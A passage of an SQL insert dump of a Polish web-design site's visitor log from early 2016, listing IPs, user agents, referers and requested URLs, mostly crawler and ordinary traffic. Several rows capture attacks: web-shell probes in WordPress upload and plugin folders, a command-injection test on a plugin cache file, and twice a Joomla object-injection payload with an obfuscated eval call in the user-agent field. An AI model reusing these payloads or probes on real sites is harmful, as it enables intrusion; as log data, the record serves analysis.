Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204','http://www.pc-one.pl/'),(96674,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18','http://www.pc-one.pl/'),(96675,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16','http://www.pc-one.pl/'),(96676,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1','http://www.pc-one.pl/'),(96677,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.21 (KHTML, like Gecko) Chrome/19.0.1042.0 Safari/535.21','http://www.pc-one.pl/'),(96678,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.700.3 Safari/534.24','http://www.pc-one.pl/'),(96679,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30','http://www.pc-one.pl/'),(96680,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24','http://www.pc-one.pl/'),(96681,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/'),(96682,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1','http://www.pc-one.pl/'),(96683,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21','http://www.pc-one.pl/'),(96684,'2016-02-13 14:59:37','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96685,'2016-02-13 14:59:38','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/13.0.766.0 Safari/534.36','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96686,'2016-02-13 14:59:38','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1','http://www.pc-one.pl/'),(96687,'2016-02-13 14:59:38','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.36 (KHTML, like Gecko) Chrome/13.0.766.0 Safari/534.36','http://www.pc-one.pl/'),(96688,'2016-02-13 16:12:59','82.117.234.29','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36','http://www.pc-one.pl/'),(96697,'2016-02-14 03:40:02','66.249.64.124','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://pc-one.pl/robots.txt'),(96699,'2016-02-14 03:40:04','66.249.64.91','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/robots.txt'),(96700,'2016-02-14 03:40:04','66.249.64.91','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/'),(96701,'2016-02-14 05:05:26','213.61.149.100','http://hvd-store.com/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://pc-one.pl/'),(96709,'2016-02-14 09:11:39','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/robots.txt'),(96716,'2016-02-14 12:02:52','68.180.229.41','','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','http://www.pc-one.pl/xmlrpc.php?rsd'),(96728,'2016-02-15 04:59:53','157.55.39.221','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml.gz'),(96734,'2016-02-15 06:18:24','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/Anon.php'),(96735,'2016-02-15 06:18:24','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/up.php?nani=1'),(96736,'2016-02-15 06:18:24','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/ha.php?nc='),(96737,'2016-02-15 06:18:25','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/so.php'),(96738,'2016-02-15 06:18:25','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/idn1.php'),(96739,'2016-02-15 06:18:25','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/mini_cp.php'),(96740,'2016-02-15 06:18:25','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-admin/includes/index.php?wphp4=1'),(96741,'2016-02-15 06:18:26','188.143.234.36','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/index.php?php4=1'),(96742,'2016-02-15 06:47:37','192.187.114.10','','}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:8:\\"feed_url\\";s:119:\\"eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59));JFactory::getConfig();exit\\";s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:5:\\"cache\\";b:1;s:11:\\"cache_class\\";O:20:\\"JDatabaseDriverMysql\\":0:{}}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";b:1;}ðýýý','http://www.pc-one.pl/'),(96778,'2016-02-16 02:12:19','192.187.114.10','','}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";O:17:\\"JSimplepieFactory\\":0:{}s:21:\\"\\\\0\\\\0\\\\0disconnectHandlers\\";a:1:{i:0;a:2:{i:0;O:9:\\"SimplePie\\":5:{s:8:\\"sanitize\\";O:20:\\"JDatabaseDriverMysql\\":0:{}s:8:\\"feed_url\\";s:119:\\"eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59));JFactory::getConfig();exit\\";s:19:\\"cache_name_function\\";s:6:\\"assert\\";s:5:\\"cache\\";b:1;s:11:\\"cache_class\\";O:20:\\"JDatabaseDriverMysql\\":0:{}}i:1;s:4:\\"init\\";}}s:13:\\"\\\\0\\\\0\\\\0connection\\";b:1;}ðýýý','http://www.pc-one.pl/'),(96783,'2016-02-16 05:06:55','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/feed/'),(96784,'2016-02-16 05:06:55','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/feed'),(96785,'2016-02-16 05:06:56','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/feed/'),(96786,'2016-02-16 05:06:56','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/xmlrpc.php'),(96787,'2016-02-16 05:06:57','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/xmlrpc.php?rsd'),(96788,'2016-02-16 05:06:57','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/xmlrpc.php?rsd'),(96789,'2016-02-16 05:06:57','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/o-nas'),(96790,'2016-02-16 05:06:57','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/o-nas/'),(96791,'2016-02-16 05:06:58','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/o-nas'),(96792,'2016-02-16 05:06:58','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/o-nas/'),(96793,'2016-02-16 05:06:58','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/tworzenie-stron'),(96794,'2016-02-16 05:06:59','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/tworzenie-stron/'),(96795,'2016-02-16 05:06:59','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/tworzenie-stron'),(96796,'2016-02-16 05:06:59','94.152.156.111','','Mozilla/5.0 (compatible; YetiBOT/0.1b; +http://yetibot.ovh)','http://www.pc-one.pl/tworzenie-stron/'),(96797,'2016-02-16 05:34:42','185.14.193.2','http://pc-one.pl/wp-content/themes/twentyfourteen/license.php','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://pc-one.pl/wp-content/themes/twentyfourteen/license.php'),(96838,'2016-02-16 20:36:44','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/category/bez-kategorii/'),(96839,'2016-02-16 20:36:45','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96840,'2016-02-16 20:36:47','69.58.178.56','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1','http://www.pc-one.pl/feed/'),(96841,'2016-02-16 21:26:37','66.249.64.124','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://pc-one.pl/robots.txt'),(96854,'2016-02-17 01:09:49','37.1.218.125','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','http://pc-one.pl/'),(96855,'2016-02-17 01:35:06','180.76.15.17','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/robots.txt'),(96857,'2016-02-17 02:59:52','208.115.113.86','','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','http://www.pc-one.pl/o-nas/'),(96862,'2016-02-17 06:23:18','91.200.12.24','http://www.pc-one.pl/FCKeditor/_whatsnew.html','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36','http://www.pc-one.pl/'),(96863,'2016-02-17 07:24:36','207.46.13.25','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/robots.txt'),(96869,'2016-02-17 10:58:42','192.243.55.131','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/feed/'),(96870,'2016-02-17 11:01:04','192.243.55.132','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/tworzenie-stron'),(96871,'2016-02-17 11:03:44','192.243.55.131','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/feed'),(96872,'2016-02-17 11:12:18','66.249.64.91','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/sitemap-pt-page-2011-03.xml'),(96873,'2016-02-17 11:44:46','202.46.48.208','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/feed/'),(96885,'2016-02-17 12:54:12','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/tworzenie-stron/feed/'),(96886,'2016-02-17 12:54:27','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/category/bez-kategorii/'),(96887,'2016-02-17 12:54:48','148.81.194.141','','Mozilla/5.0 (Nekstbot; http://nekst.ipipan.waw.pl/nekstbot/)','http://www.pc-one.pl/wp-content/plugins/wp-spamfree/img/wpsf-img.php'),(96888,'2016-02-17 14:10:39','216.2.83.26','http://buyessaynow.biz','BUY ESSAY PAPER COURSEWORK DISSERTATION THESIS','http://pc-one.pl/'),(96904,'2016-02-18 04:55:03','66.249.64.91','','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.pc-one.pl/robots.txt'),(96910,'2016-02-18 07:48:30','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/js_composer/assets/lib/jcarousellite/LICENSE.php'),(96911,'2016-02-18 07:48:30','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/js_composer/assets/lib/jcarousellite/test.php'),(96912,'2016-02-18 07:48:31','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/js_composer/assets/lib/prettyphoto/images/prettyPhoto/light_rounded/gpl_license.php'),(96913,'2016-02-18 07:48:31','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/js_composer/assets/js/LICENSE.php'),(96914,'2016-02-18 07:48:31','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/js_composer/include/params/textarea_html/LICENSE.php'),(96915,'2016-02-18 07:48:31','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/plugins/js_composer/include/classes/core/LICENSE.php'),(96916,'2016-02-18 07:48:31','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/2015/01/LICENSE.php'),(96917,'2016-02-18 07:48:32','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-content/uploads/2015/01/debug.php'),(96918,'2016-02-18 07:48:32','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-includes/js/tinymce/plugins/charmap/LICENSE.php'),(96919,'2016-02-18 07:48:32','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-includes/LICENSE.php'),(96920,'2016-02-18 07:48:33','188.143.234.48','','Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.51','http://pc-one.pl/wp-admin/user/LICENSE.php'),(96921,'2016-02-18 07:50:34','157.55.39.234','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml'),(96922,'2016-02-18 08:36:46','204.236.235.245','','ia_archiver','http://www.pc-one.pl/robots.txt'),(96941,'2016-02-19 01:27:10','188.120.246.106','http://pc-one.pl/xmlrpc.php','Mozilla/4.79 [en] (X11; U; SunOS 5.7 sun4u)','http://pc-one.pl/xmlrpc.php'),(96943,'2016-02-19 01:30:40','203.133.168.10','','Mozilla/5.0 (compatible; MSIE or Firefox mutant;) Daum 4.1','http://www.pc-one.pl/'),(96944,'2016-02-19 01:42:44','204.236.235.245','','ia_archiver','http://www.pc-one.pl/robots.txt'),(96945,'2016-02-19 01:42:44','204.236.235.245','','ia_archiver','http://www.pc-one.pl/'),(96946,'2016-02-19 03:52:48','40.77.167.67','','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','http://www.pc-one.pl/sitemap.xml.gz'),(96964,'2016-02-20 15:14:37','202.46.51.185','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96965,'2016-02-20 15:14:41','202.46.50.186','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96966,'2016-02-20 15:43:18','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(96967,'2016-02-21 04:31:31','202.46.48.134','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96968,'2016-02-21 06:34:40','202.46.51.30','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96969,'2016-02-21 06:34:45','202.46.56.18','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96970,'2016-02-21 09:53:35','202.46.50.187','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/xmlrpc.php?rsd'),(96971,'2016-02-21 22:50:28','202.46.58.122','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','http://www.pc-one.pl/'),(96973,'2016-02-22 03:26:59','202.46.56.182','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/xmlrpc.php?rsd'),(96974,'2016-02-22 03:57:08','64.246.165.50','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','http://www.pc-one.pl/robots.txt'),(96975,'2016-02-22 03:57:09','64.246.165.50','http://whois.domaintools.com/pc-one.pl','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','http://www.pc-one.pl/'),(96976,'2016-02-22 21:09:14','202.46.50.78','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/o-nas/'),(96977,'2016-02-23 16:43:43','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(96978,'2016-02-24 08:54:41','202.46.51.18','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96980,'2016-02-25 02:21:12','202.46.54.141','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96984,'2016-02-26 09:03:13','202.46.48.199','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/tworzenie-stron/'),(96985,'2016-02-26 17:50:29','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(96989,'2016-02-26 18:33:55','192.243.55.131','','Mozilla/5.0 (compatible; SemrushBot/1~bl; +http://www.semrush.com/bot.html)','http://www.pc-one.pl/o-nas'),(96990,'2016-02-28 00:42:16','202.46.52.179','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96992,'2016-02-28 21:23:58','202.46.49.71','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(96994,'2016-02-29 01:39:56','202.46.55.87','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(96998,'2016-03-03 18:42:38','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(96999,'2016-03-04 04:31:07','202.46.53.191','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97005,'2016-03-05 03:49:04','202.46.53.14','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/tworzenie-stron/'),(97007,'2016-03-06 19:05:30','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97008,'2016-03-07 15:55:00','202.46.50.198','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97009,'2016-03-08 04:00:14','202.46.51.101','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/o-nas/'),(97012,'2016-03-08 19:07:54','202.46.49.195','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97013,'2016-03-09 11:59:49','202.46.54.93','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97015,'2016-03-09 19:24:30','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97018,'2016-03-10 16:10:55','80.50.117.130','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://pc-one.pl/'),(97019,'2016-03-10 16:11:15','80.50.117.130','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1','http://www.pc-one.pl/'),(97020,'2016-03-11 20:48:06','202.46.54.210','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97023,'2016-03-12 14:24:03','202.46.58.210','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97024,'2016-03-12 16:19:19','202.46.48.85','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97025,'2016-03-12 19:43:52','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97026,'2016-03-13 04:22:59','202.46.52.172','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/tworzenie-stron/'),(97027,'2016-03-13 09:52:27','202.46.48.138','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97028,'2016-03-13 09:52:31','202.46.48.206','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97029,'2016-03-15 19:49:56','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97030,'2016-03-15 22:53:20','202.46.50.160','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97031,'2016-03-16 11:19:32','202.46.52.16','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/o-nas/'),(97032,'2016-03-16 17:25:42','202.46.49.116','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97033,'2016-03-16 17:25:43','202.46.58.164','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97034,'2016-03-16 20:29:12','202.46.54.185','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97036,'2016-03-17 02:44:30','202.46.57.173','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97037,'2016-03-18 12:58:41','202.46.56.130','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/feed/'),(97038,'2016-03-18 21:37:10','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97039,'2016-03-19 15:09:34','202.46.50.12','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/feed/'),(97040,'2016-03-19 18:08:17','202.46.52.154','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/xmlrpc.php'),(97041,'2016-03-19 18:41:47','202.46.51.25','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97042,'2016-03-20 01:04:14','202.46.54.130','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/xmlrpc.php'),(97043,'2016-03-20 09:56:15','202.46.55.19','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97044,'2016-03-20 09:56:17','202.46.57.79','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://www.pc-one.pl/'),(97045,'2016-03-20 23:20:25','202.46.50.134','','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','http://pc-one.pl/'),(97046,'2016-03-21 22:12:15','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97047,'2016-03-24 23:17:28','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97048,'2016-03-28 01:00:33','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97049,'2016-03-31 01:29:16','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','http://www.pc-one.pl/'),(97050,'2016-04-03 01:52:20','91.121.4.161','http://pomocy.net.pl','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; 